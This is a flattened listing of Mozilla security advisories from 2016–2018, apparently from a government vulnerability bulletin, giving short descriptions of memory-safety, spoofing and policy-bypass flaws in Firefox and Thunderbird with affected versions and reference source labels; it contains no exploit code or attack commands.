mozilla -- multiple_productsMemory safety bugs were reported in Firefox 52, Firefox ESR 45.8, Firefox ESR 52, and Thunderbird 52. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5429
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_productsA buffer overflow can occur when the image renderer attempts to paint non-displayable SVG elements. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7786
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_productsThe Firefox installer on Windows can be made to load malicious DLL files stored in the same directory as the installer when it is run. This allows privileged execution if the installer is run with elevated privileges. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7755
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_productsA mechanism that uses AppCache to hijack a URL in a domain using fallback by serving the files from a sub-path on the domain. This has been addressed by requiring fallback files be inside the manifest directory. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7807
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_productsSeveral fonts on OS X display some Tibetan and Arabic characters as whitespace. When used in the addressbar as part of an IDN this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7825
BID
SECTRACK
CONFIRM
CONFIRM
MLIST
GENTOO
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
During TLS 1.2 exchanges, handshake hashes are generated which point to a message buffer. This saved data is used for later messages but in some cases, the handshake transcript can exceed the space available in the current buffer, causing the allocation of a new buffer. This leaves a pointer pointing to the old, freed buffer, resulting in a use-after-free when handshake hashes are then calculated afterwards. This can result in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7805
BID
SECTRACK
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while adjusting layout during SVG animations with text paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5155
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Characters from the "Canadian Syllabics" unicode block can be mixed with characters from other unicode blocks in the addressbar instead of being rendered as their raw "punycode" form, allowing for domain name spoofing attacks through character confusion. The current Unicode standard allows characters from "Aspirational Use Scripts" such as Canadian Syllabics to be mixed with Latin characters in the "moderately restrictive" IDN profile. We have changed Firefox behavior to match the upcoming Unicode version 10.0 which removes this category and treats them as "Limited Use Scripts.". This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7764
BID
SECTRACK
MISC
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
JIT-spray targeting asm.js combined with a heap spray allows for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5400
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The JSON viewer in the Developer Tools uses insecure methods to create a communication channel for copying and viewing JSON or HTTP headers data, allowing for potential privilege escalation. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5390
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during specific user interactions with the input method editor (IME) in some languages due to how events are handled. This results in a potentially exploitable crash but would require specific user interaction to trigger. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7752
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A potential use-after-free found through fuzzing during DOM manipulation of SVG content. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5380
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A number of security vulnerabilities in the Graphite 2 library including out-of-bounds reads, buffer overflow reads and writes, and the use of uninitialized memory. These issues were addressed in Graphite 2 version 1.3.10. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7778
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
GENTOO
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The Mozilla Updater can be made to choose an arbitrary target working directory for output files resulting from the update process. This vulnerability requires local system access. Note: this issue only affects Windows operating systems. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5294
BID
SECTRACK
CONFIRM
GENTOO
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A mechanism to spoof the addressbar through the user interaction on the addressbar and the "onblur" event. The event could be used by script to affect text display to make the loaded site appear to be different from the one actually loaded within the addressbar. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5451
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Video files loaded video captions cross-origin without checking for the presence of CORS headers permitting such cross-origin use, leading to potential information disclosure for video captions. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5408
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds write vulnerability while decoding improperly formed BinHex format archives. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5443
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur in WebSockets when the object holding the connection is freed before the disconnection operation is finished. This results in an exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7800
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A same-origin policy bypass with local shortcut files to load arbitrary local content from disk. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5291
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Mozilla developers backported selected changes in the Skia library. These changes correct memory corruption issues including invalid buffer reads and writes during graphic operations. This vulnerability affects Thunderbird ESR < 52.8, Thunderbird < 52.8, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5183
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
When a page's content security policy (CSP) header contains a "sandbox" directive, other directives are ignored. This results in the incorrect enforcement of CSP. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7803
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when reading an image observer during frame reconstruction after the observer has been freed. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7784
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 53 and Firefox ESR 52.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-5470
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Hashed codes of JavaScript objects are shared between pages. This allows for pointer leaks because an object's address can be discovered through hash codes, and also allows for data leakage of an object's content using these hash codes. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5378
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A heap-buffer-overflow in Cairo when processing SVG content caused by compiler optimization, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5296
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow was found during UTF8 to Unicode string conversion within JavaScript with extremely large amounts of data. This vulnerability requires the use of a malicious or vulnerable legacy extension in order to occur. This vulnerability affects Thunderbird ESR < 52.8, Thunderbird < 52.8, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5178
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 57 and Firefox ESR 52.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5089
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow will occur when viewing a certificate in the certificate manager if the certificate has an extremely long object identifier (OID). This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7792
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during mouse event handling due to issues with multiprocess support. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5103
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory corruption resulting in a potentially exploitable crash during WebGL functions using a vector constructor with a varying array within libGLES. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9897
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 58 and Firefox ESR 52.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59.2018-06-11not yet calculatedCVE-2018-5125
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The destructor function for the "WindowsDllDetourPatcher" class can be re-purposed by malicious code in concert with another vulnerability to write arbitrary data to an attacker controlled location in memory. This can be used to bypass existing memory protections in this situation. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7804
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 56 and Firefox ESR 52.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.2018-06-11not yet calculatedCVE-2017-7826
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Certain response codes in FTP connections can result in the use of uninitialized values for ports in FTP operations. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.2018-06-11not yet calculatedCVE-2017-5405
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read in WebGL with a maliciously crafted "ImageInfo" object during WebGL operations. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7754
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 55 and Firefox ESR 52.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7810
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to a failure to propagate error conditions during matching while evaluating context, leading to objects being used when they no longer exist. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5440
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free while manipulating XSL in XSLT documents. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5376
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free and use-after-scope vulnerability when logging errors from headers for XML HTTP Requests (XHR). This could result in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7756
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A mechanism to bypass file system access protections in the sandbox to use the file picker to access different files than those selected in the file picker through the use of relative paths. This allows for read only access to the local file system. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5454
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in the Media Decoder when working with media files when some events are fired after the media elements are freed from memory. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5396
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in IndexedDB when one of its objects is destroyed in memory while a method on it is still being executed. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7757
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 49 and Firefox ESR 45.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-5290
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
During DOM manipulations of the accessibility tree through script, the DOM tree can become out of sync with the accessibility tree, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5464
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating the DOM during the resize event of an image element. If these elements have been freed due to a lack of strong references, a potentially exploitable crash may occur when the freed elements are accessed. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7802
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read vulnerability with the Opus encoder when the number of channels in an audio stream changes while the encoder is in use. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7758
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow can occur when manipulating the SVG "animatedPathSegList" through script. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.7, Firefox ESR < 52.7, and Firefox < 59.2018-06-11not yet calculatedCVE-2018-5127
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur in the Fetch API when the worker or the associated window are freed when still in use, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7793
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow can occur in the Skia library due to 32-bit integer use in an array without integer overflow checks, resulting in possible out-of-bounds writes. This could lead to a potentially exploitable crash triggerable by web content. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.2018-06-11not yet calculatedCVE-2018-5159
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while re-computing layout for a "marquee" element during window resizing where the updated style object is freed while still in use. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7801
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur in design mode when image objects are resized if objects referenced during the resizing have been freed from memory. This results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7819
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The content security policy (CSP) "sandbox" directive did not create a unique origin for the document, causing it to behave as if the "allow-same-origin" keyword were always specified. This could allow a Cross-Site Scripting (XSS) attack to be launched from unsafe content. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.2018-06-11not yet calculatedCVE-2017-7823
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 50.1 and Firefox ESR 45.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.2018-06-11not yet calculatedCVE-2017-5373
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to poor handling of template parameters. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5439
BID
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to the result handler being held by a freed handler during handling. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5438
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free resulting in potentially exploitable crash when manipulating DOM subtrees in the Editor. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9898
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during video control operations when a "<track>" element holds a reference to an older window if that window has been replaced in the DOM. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7750
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Fixed potential buffer overflows in generated Firefox code due to CVE-2016-6354 issue in Flex. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5469
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs during transaction processing in the editor during design mode interactions. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5435
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs when redirecting focus handling which results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5434
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability when using an incorrect URL during the reloading of a docshell. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7749
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow resulting in a potentially exploitable crash due to memory allocation issues when handling large amounts of incoming data. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.2018-06-11not yet calculatedCVE-2016-9066
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An attacker could use a JavaScript Map/Set timing attack to determine whether an atom is used by another compartment/zone in specific contexts. This could be used to leak information, such as usernames embedded in JavaScript code, across websites. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9904
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when form input elements, focus, and selections are manipulated by script content. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5098
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating HTML media elements with media streams, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.2018-06-11not yet calculatedCVE-2018-5102
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Default fonts on OS X display some Tibetan characters as whitespace. When used in the addressbar as part of an IDN this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.2018-06-11not yet calculatedCVE-2017-7763
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out of bounds memory write while processing Vorbis audio data was reported through the Pwn2Own contest. This vulnerability affects Firefox < 59.0.1, Firefox ESR < 52.7.2, and Thunderbird < 52.7.2018-06-11not yet calculatedCVE-2018-5146
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
MLIST
UBUNTU
UBUNTU
UBUNTU
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
On pages containing an iframe, the "data:" protocol can be used to create a modal alert that will render over arbitrary domains following page navigation, spoofing of the origin of the modal alert from the iframe content. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.2018-06-11not yet calculatedCVE-2017-7791
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Thunderbird 45.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.2018-06-11not yet calculatedCVE-2016-9893
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
